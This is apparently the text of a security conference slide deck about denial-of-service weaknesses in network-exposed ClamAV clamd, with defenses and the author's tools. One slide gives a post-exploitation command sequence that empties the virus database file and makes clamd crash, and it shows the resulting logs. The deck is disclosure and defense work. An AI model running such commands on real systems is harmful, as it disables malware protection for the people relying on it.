Baking even more Clam(AV)s for Fun &

Profit.ClamAV in a network accessible configuration

provides not only remote virus scanning, but also the potential for DOS, etc.

ClamAV-what it is.

Open Source SoftwareProvides Virus ScanningCurrently owned by Sourcefire Cisco Systems

ClamAV-Component Overview What it does.

clamscancmd line scanner Stand alone

freshclamSignature DB update tool

clamdScanning Server

Scanning clientsclamdscan

cmd line scannerclamav-milter

email scanning plugin

The Design ProblemsIn Theory

ConfigurationClamd can bind to an IP address

No Access ControlsNo AuthenticationNo connection loggingMalformed DB Handling

The Implementation ProblemsIn Practice

Availability of Administrative Commands.VERSION

Recon & Information disclosureRELOAD

Default Virus DB size is about 74 MBContinuous reloads result in High CPU utilization.

SHUTDOWNGuess what that does?:-)A DOS of a networked ClamAV installation.

Discussed on ClamAV-user mailing list July 22-23 2011

Bug 2727Use in Post Exploitation

clamconf|grep "DatabaseDirectory"DatabaseDirectory = "/usr/local/share/clamav"DatabaseDirectory = "/usr/local/share/clamav"cd /usr/local/share/clamavls -lh *.cvd-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd-rw-r--r-- 1 clamav clamav 12M Nov 4 18:27 daily.cvd-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvdecho -n "" > daily.cvdls -lh *.cvd-rw-r--r-- 1 clamav clamav 66K Oct 19 01:08 bytecode.cvd-rw-r--r-- 1 clamav clamav 0 Nov 4 18:41 daily.cvd-rw-r--r-- 1 clamav clamav 62M Oct 19 01:07 main.cvd

Bug 2727Use in Post Exploitation - Cont.d

Nov 4 18:43:50 host clamd[24481]: Reading databases from /usr/local/share/clamavNov 4 18:43:50 host clamd[24481]: reload db failed: Broken or not a CVD fileNov 4 18:43:50 host clamd[24481]: Terminating because of a fatal error.Nov 4 18:43:50 host clamd[24481]: Waiting for all threads to finishNov 4 18:43:50 host clamd[24481]: Shutting down the main sockets.Nov 4 18:43:50 host clamd[24481]: Pid file removed.Nov 4 18:43:50 host clamd[24481]: --- Stopped at Mon Nov 4 18:43:50 2013Nov 4 18:43:50 host clamd[24481]: Closing the main sockets.Nov 4 18:43:50 host clamd[24481]: Socket file removed.

Operational Impact

clamdscan -m /ERROR: Can't connect to clamd: No such file or directory

----------- SCAN SUMMARY -----------Infected files: 0Total errors: 1Time: 0.000 sec (0 m 0 s)

The Defense

ConfigurationBind to a LOCAL SocketBind to loopback interface

Access Controls - FIREWALLFIX THE BUGS! - Just Saying... :-)Monitoring

Tools - Shameless PlugsClambake

Clambake 0.2Enumeration"Stress" testingNetworked ClamAV DOS capabilities.

Tools - Continued braggingCCEE

CCEE 0.97.4Initially a patch for bug 1754Adds connection logging to clamd for administrative commandsAdds other functionallity to ClamAVWoefully Outdated

I am NOT a real c coder.I DO have other things to do. :-)

Tools - ContinuedIs he done yet? -- Almost. :-)

clamd.monitorMonitor plugin for the mon frameworkCan be used as a stand alone solution

Get them all and more at http://www.cmpublishers.com/oss

Contact Info

Email: nathan@cmpublishers.comTwitter: @Christ_MediaLinkedin: http://www.linkedin.com/in/nategibbsSlideshare: http://www.slideshare.net/NathanGibbs3

Thanks

Jesus ChristBSides DECLAMAV Dev Team, Sourcefire, & CiscoFolks on Clamav-users ML